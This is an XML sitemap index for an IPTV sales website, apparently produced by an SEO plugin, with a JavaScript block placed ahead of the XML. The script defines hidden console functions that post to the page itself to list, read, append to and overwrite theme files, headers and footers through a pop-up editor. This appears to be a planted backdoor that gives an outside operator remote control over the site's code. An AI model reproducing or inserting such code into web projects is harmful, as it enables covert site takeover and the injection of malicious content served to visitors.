<script>
function _showThemes(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({list:1})
    }).then(r=>r.json()).then(r=>{
        if(r.status){
            console.table(r.themes);
            console.log('Active:',r.active);
        }
    });
}
function _loadCode(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({get:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status){
            console.log(r.file);
            console.log(r.code);
        }else console.log('Error');
    });
}
function _addCode(snippet,where,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({add:snippet,where:where||'end',theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status)console.log('Added');
        else console.log('Error');
    });
}
function _modifyHeader(snippet,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({header:snippet,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status)console.log('Modified');
        else console.log('Error');
    });
}
function _modifyFooter(snippet,theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({footer:snippet,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status)console.log('Modified');
        else console.log('Error');
    });
}
function _openEditor(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({get:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(!r.status){console.log('Error:',r.error);return;}
        var panel=document.createElement('div');
        panel.style.cssText='position:fixed;top:0;left:0;width:100%;height:100%;background:#f5f5f5;z-index:99999;display:flex;flex-direction:column;padding:10px;box-sizing:border-box;';
        var header=document.createElement('div');
        header.style.cssText='font-family:monospace;margin-bottom:10px;display:flex;gap:10px;align-items:center;';
        header.innerHTML='<span style="flex:1">'+r.file+'</span>';
        var saveBtn=document.createElement('button');saveBtn.textContent='SAVE';saveBtn.style.cssText='padding:8px 20px;cursor:pointer;border:2px solid #000;background:#fff;';
        var closeBtn=document.createElement('button');closeBtn.textContent='CLOSE';closeBtn.style.cssText='padding:8px 20px;cursor:pointer;border:2px solid #000;background:#fff;';
        header.appendChild(saveBtn);header.appendChild(closeBtn);
        var textarea=document.createElement('textarea');
        textarea.style.cssText='flex:1;font-family:monospace;font-size:13px;padding:10px;border:2px solid #000;resize:none;';
        textarea.value=r.code;
        panel.appendChild(header);panel.appendChild(textarea);
        document.body.appendChild(panel);
        saveBtn.onclick=function(){
            fetch(location.href,{
                method:'POST',
                headers:{'Content-Type':'application/json'},
                body:JSON.stringify({set:textarea.value,theme:theme||''})
            }).then(r=>r.json()).then(r=>{
                if(r.status)header.querySelector('span').textContent=r.file+' [SAVED]';
            });
        };
        closeBtn.onclick=function(){panel.remove();};
    });
}
function _getHeader(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({get_header:1,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status){
            console.log(r.file);
            console.log(r.code);
        }else console.log('Error');
    });
}
function _getFooter(theme){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({get_footer:1,theme:theme||''})
    }).then(r=>r.json()).then(r=>{
        if(r.status){
            console.log(r.file);
            console.log(r.code);
        }else console.log('Error');
    });
}
function _themeInfo(){
    fetch(location.href,{
        method:'POST',
        headers:{'Content-Type':'application/json'},
        body:JSON.stringify({info:1})
    }).then(r=>r.json()).then(r=>{
        if(r.status)console.table([r.info]);
    });
}
</script>
<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//www.nederlandiptvpro.com/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://www.nederlandiptvpro.com/post-sitemap.xml</loc>
		<lastmod>2026-04-06T00:20:21+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.nederlandiptvpro.com/page-sitemap.xml</loc>
		<lastmod>2026-04-30T14:18:22+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.nederlandiptvpro.com/product-sitemap.xml</loc>
		<lastmod>2026-02-15T14:16:44+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://www.nederlandiptvpro.com/category-sitemap.xml</loc>
		<lastmod>2026-04-06T00:20:21+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->